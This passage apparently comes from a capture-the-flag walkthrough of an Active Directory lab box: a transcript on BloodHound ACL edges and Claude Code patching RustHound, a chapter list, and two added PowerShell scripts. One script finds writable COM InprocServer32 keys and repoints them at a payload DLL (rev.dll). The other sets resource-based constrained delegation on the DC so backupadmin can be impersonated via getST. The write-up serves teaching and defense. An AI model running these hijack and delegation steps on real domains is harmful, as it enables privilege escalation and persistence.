SeInteractiveLogonRight, right? Oh, there we go. SeDenyNetworkLogonRight, to support and Delegation Manager. So, this is why ee.reed could not WinRM to the box, because it has the SeDenyNetworkLogonRight. Right. So, hopefully you enjoyed this. So, take care and I'll see you all. Apologies for the sloppy cut, but the video is not over. After I recorded the video, I was playing more with this box, trying to figure out why RustHound missed one of the properties and exactly what the property meant. And specifically, I'm talking about how we knew we had access to this Protected Objects group, right? Because if I click on here and go into inbound, RustHound had missed the helpdesk having AddMember on this object. And this AddMember is kind of, I think, confusing, because this is actually WriteProperty on member, I believe. So if we have this AddMember we can also remove. So the BloodHound Python code is not wrong. It's just I think the edge is kind of misleading in the name, because normally you see WriteProperty and then something else, but this is just called AddMember. If you can add, you can probably remove. I guess I think that's what's going on, right. And if we look at the actual data from BloodHound, from RustHound, it would be in groups. So, I'm going to cat this file. We can do jq . Let's go over to less. And then I'm going to look at Protected Objects. And if we look at all the ACEs, 512, I think this is Administrator, administrator, probably domain. 519. All these 500s are going to be standard default Active Directory groups, right? So, I'm gonna go and look at the Python data. And that was this one right here. So, I'm just going to mkdir a temp directory. Let's unzip this file, 7z. There we go. And then we're going to cat, where is the groups? Right here. jq. Go to Protected Objects. And right off the bat, oh, this is, oh, here we go. AddMember, PrincipalSID right here.
So this is showing the AddMember here. If I look at the SID, that is going to be the SID of helpdesk, I believe. Right here. Yeah, ObjectIdentifier, name is helpdesk. So, the Python ingestor collected it, but for some reason RustHound didn't, and we're going to find out exactly why. But before I do that, let's just show one last thing. I always like knowing how to do things manually. So, let's get back on the box. We're going to get a shell as bb.morgan. I'm gonna do Get-ADGroup Protected Object, right? Is it Object or Objects? There we go. Because I wanted to get the GUID. Is it the GUID? No, I want to get the full DistinguishedName. This is what I wanted. And then we can do a Get-Acl on the AD: drive. If you don't run an AD command to automatically import the ActiveDirectory module, this is going to fail because you don't have this AD: path. So if you run Get-Acl with AD: and it fails, just try to do a Get-ADUser or import the ActiveDirectory module. We'll do this. Specify the DN. And this should get the ACL. Yep. So, let's go like this and then do .Access. I really should probably just switch to Devious-WinRM or something. That really annoys me when it fails, but I can show, if I just paste this, the command's going to fail because we don't have the AD: drive. Get-ADUser, let's just do Administrator. Doesn't really matter who we do, but that imports the module, gives us the AD: drive, and bada bing. So let's search for, what was it? helpdesk. There we go. We see WriteProperty and we don't see AddMember, but we have this ObjectType. And if we look at what this ObjectType is, I'm just going to Google this. Go here, search. We can see this GUID matches over to member, right? So that's how we have the WriteProperty over member. And that's why it's showing AddMember as the BloodHound edge. So now I want to go over to RustHound again. In the RustHound code, actually, it has all the GUIDs.
I think if I just search this, curse the demo gods. I guess it's not called that. Is it probably like, what is it? Force. Oh, because I'm not logged in, and that's why I'm not seeing it. Let's just clone this. git clone, paste, cd rusthound. That change to GitHub always throws me off. What is this? Did that go to my clipboard? It did. grep -R for this thing. And we can see in the constants that is WriteMember, this thing. But this isn't where the magic happens. The magic's actually going to happen with Claude Code. So if I just type claude here, I've already got Claude Code installed and I logged into my account. We just have this. I'm going to ask it a question. I'm just going to say, let's say this is not grabbing the WriteProperty AddMember ACL on an Active Directory group. I'm going to hope it does it similar to how it did when I was just playing with this off recording. It's going to take a while to run. I think it took me like 5 to 10 minutes, but it actually fixed the code and all I had to do was say yes. It's real
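The registry part of the walkthrough, the reg query over HKCR\CLSID, the Get-Acl on the 7-Zip InprocServer32 key and the Set-ItemProperty that repoints it, as one added PowerShell example. This is not IppSec's code and not something shipped with the box; the principal name RUSTYKEY\support and the payload path C:\ProgramData\rev.dll are illustrative assumptions taken from the narration. It generalises the manual check to every CLSID whose DLL path matches a pattern, and keeps the previous value so the key can be restored:

```powershell
# Added example, not from the video: list COM in-process servers whose DLL path matches a
# pattern, report whether a named principal holds a write right on the InprocServer32 key,
# and repoint that key. RUSTYKEY\support and the DLL path are illustrative assumptions.

function Find-WritableComServer {
    param(
        [string]   $Pattern   = '7-zip',
        [string[]] $Principal = @('RUSTYKEY\support')
    )
    # HKCR has no default PSDrive; the Registry:: provider path works without New-PSDrive.
    $clsidRoot = 'Registry::HKEY_CLASSES_ROOT\CLSID'
    # FullControl and WriteKey both include the SetValue bit, so one mask covers all three.
    $setValue  = [System.Security.AccessControl.RegistryRights]::SetValue

    Get-ChildItem -Path $clsidRoot -ErrorAction SilentlyContinue | ForEach-Object {
        $srvKey = $_.PSPath + '\InprocServer32'
        if (-not (Test-Path -Path $srvKey)) { return }

        # The (default) value is the DLL Explorer loads when it instantiates this CLSID.
        $dll = (Get-ItemProperty -Path $srvKey -ErrorAction SilentlyContinue).'(default)'
        if (-not $dll -or $dll -notmatch [regex]::Escape($Pattern)) { return }

        # Only direct ACEs for the named principals are matched; nested group membership
        # is not resolved here, so "Writable = False" is not proof the key is safe.
        $acl     = Get-Acl -Path $srvKey
        $writers = @($acl.Access | Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            (($_.RegistryRights -band $setValue) -ne 0) -and
            ($Principal -contains $_.IdentityReference.Value)
        })

        [pscustomobject]@{
            CLSID    = $_.PSChildName
            Dll      = $dll
            Writable = ($writers.Count -gt 0)
            By       = ($writers.IdentityReference.Value -join ', ')
        }
    }
}

function Set-ComServerDll {
    # Repoints InprocServer32 at $DllPath and returns the previous value so the same
    # cmdlet can put it back once the engagement is over.
    param(
        [Parameter(Mandatory)] [string] $Clsid,
        [Parameter(Mandatory)] [string] $DllPath
    )
    $srvKey   = "Registry::HKEY_CLASSES_ROOT\CLSID\$Clsid\InprocServer32"
    $previous = (Get-ItemProperty -Path $srvKey).'(default)'
    # Set-ItemProperty, not Set-Item: Set-Item targets the key object, not its values.
    Set-ItemProperty -Path $srvKey -Name '(default)' -Value $DllPath
    [pscustomobject]@{
        CLSID    = $Clsid
        Previous = $previous
        Current  = (Get-ItemProperty -Path $srvKey).'(default)'
    }
}

# Usage, in a session running as the principal that holds the write right (after RunasCs):
#   Find-WritableComServer -Pattern '7-zip' -Principal 'RUSTYKEY\support' | Format-Table
#   Set-ComServerDll -Clsid '{the CLSID reported above}' -DllPath 'C:\ProgramData\rev.dll'
```

Two caveats a practitioner wants here. First, HKEY_CLASSES_ROOT is a merged view of HKLM\Software\Classes and HKCU\Software\Classes; a write through Registry::HKEY_CLASSES_ROOT lands in the HKLM copy unless the key already exists under HKCU, and only the HKLM copy affects other users' Explorer sessions, which is what the hijack relies on. Second, the payload DLL is loaded in-process by whatever opens the archive, so a DLL that never returns from DllMain (a plain reverse shell) will hang that process; for anything beyond a lab box, spawn the shell in a new thread and let DllMain return.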
Original Description
00:00 - Introduction
01:00 - Start of nmap
05:00 - Syncing our time with the DC via NTPDate
10:12 - Writing a custom Cypher Query in Bloodhound to show everything that users and computers can directly do, except for group memberships. Discover an oddity around IT-COMPUTER3 and seeing its password set date is also odd
14:00 - Using NetExec to perform a TimeRoast attack and then cracking the computer password
18:15 - Back in Bloodhound, we can see IT-Computer3 has a path to take over several users
22:45 - Using BloodyAD to add ourself to the helpdesk group and then reset BB.MORGAN's password
25:00 - Still cannot log in, discovering BB.MORGAN is a member of the Protected Users/Objects group. Trying to use AES instead of RC4 with impacket, still have issue. Assume the domain doesn't support it, this feels weird.
29:30 - Using BloodyAD to remove the user from the Protected Objects group, then logging in with BB.MORGAN
35:30 - Find a PDF and it talks about Context Menus and COM Objects with Zip programs
39:10 - Using reg query to show CLSIDs, then identifying that support can modify the one that points to 7-zip's DLL
44:00 - Using RunAsCS to switch to the support user (ee.reed) as remote logins appeared to be disabled for them
46:00 - Performing the COM Hijack on 7-zip and getting a reverse shell as mm.turner.
49:55 - Shell returned as mm.turner, who has the AllowedToAct on the DC
53:30 - Using Set-ADComputer to set the delegation permission, then getST to impersonate BackupAdmin get admin
01:05:05 - Showing why EE.REED could not login, diving into looking at the secpol command to dump security policies
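The 53:30 step (Set-ADComputer on the DC, then getST to impersonate backupadmin) as an added PowerShell example run from the ActiveDirectory module. This is not IppSec's code; the object names DC, IT-COMPUTER3, backupadmin and Administrator are the ones the walkthrough uses, and the Protected Users check is standard Active Directory behaviour rather than anything the box is stated to configure. It adds the two checks the video does by eye (AccountNotDelegated on the candidate target, and reading the delegation attribute back as a raw security descriptor) plus the clean-up:

```powershell
# Added example, not from the video: set, verify and remove resource-based constrained
# delegation on a computer object, and vet the account to impersonate first.
# Names (DC, IT-COMPUTER3, backupadmin) follow the walkthrough; nothing here is box code.
Import-Module ActiveDirectory

function Test-ImpersonationTarget {
    # S4U2Proxy will not produce a usable ticket for an account flagged
    # "sensitive and cannot be delegated" (AccountNotDelegated) or for a member of the
    # built-in Protected Users group, so check both before choosing whom to impersonate.
    param([string[]] $Candidate = @('Administrator', 'backupadmin'))
    foreach ($name in $Candidate) {
        $u = Get-ADUser -Identity $name -Properties AccountNotDelegated, MemberOf
        $protected = [bool](@($u.MemberOf) -match '^CN=Protected Users,')
        [pscustomobject]@{
            User                = $u.SamAccountName
            AccountNotDelegated = $u.AccountNotDelegated
            ProtectedUsers      = $protected
            Usable              = (-not $u.AccountNotDelegated) -and (-not $protected)
        }
    }
}

function Get-RbcdDelegate {
    # Reads msDS-AllowedToActOnBehalfOfOtherIdentity back as the security descriptor it
    # really is, rather than trusting the friendly PrincipalsAllowedToDelegateToAccount view.
    param([string] $Target = 'DC')
    $attr = 'msDS-AllowedToActOnBehalfOfOtherIdentity'
    $sd   = (Get-ADComputer -Identity $Target -Properties $attr).$attr
    if (-not $sd) { return @() }
    $sd.Access | ForEach-Object { $_.IdentityReference.Value }
}

function Set-RbcdDelegate {
    # Writes the attribute on $Target so that $Delegate may request service tickets to
    # $Target on behalf of other users. Requires WriteProperty on the target computer
    # object, which is what membership of Delegation Manager grants in the walkthrough.
    param(
        [string] $Target   = 'DC',
        [string] $Delegate = 'IT-COMPUTER3'
    )
    $delegateObj = Get-ADComputer -Identity $Delegate
    Set-ADComputer -Identity $Target -PrincipalsAllowedToDelegateToAccount $delegateObj
    Get-RbcdDelegate -Target $Target
}

function Remove-RbcdDelegate {
    # Clean-up: clearing the attribute removes the delegation path entirely.
    param([string] $Target = 'DC')
    Set-ADComputer -Identity $Target -Clear 'msDS-AllowedToActOnBehalfOfOtherIdentity'
}

# Usage, from a session as the account holding the write right (mm.turner in the video):
#   Test-ImpersonationTarget | Format-Table
#   Set-RbcdDelegate -Target 'DC' -Delegate 'IT-COMPUTER3'   # should return RUSTYKEY\IT-COMPUTER3$
#   Remove-RbcdDelegate -Target 'DC'                         # when finished
```

The attribute only states who may delegate to the target; the impersonation itself is still done from the attacking host with the delegate's own credentials, as in the video: Impacket's getST.py with -spn cifs/dc.rustykey.htb, -impersonate backupadmin and the IT-COMPUTER3$ password, then KRB5CCNAME pointing at the resulting ccache. Because IT-COMPUTER3 already exists and its password is known from the timeroast, no MachineAccountQuota is consumed and nothing new shows up as a recently created computer object, which is the detail a defender reviewing this path should note: the only artefact is the write to msDS-AllowedToActOnBehalfOfOtherIdentity on the DC object.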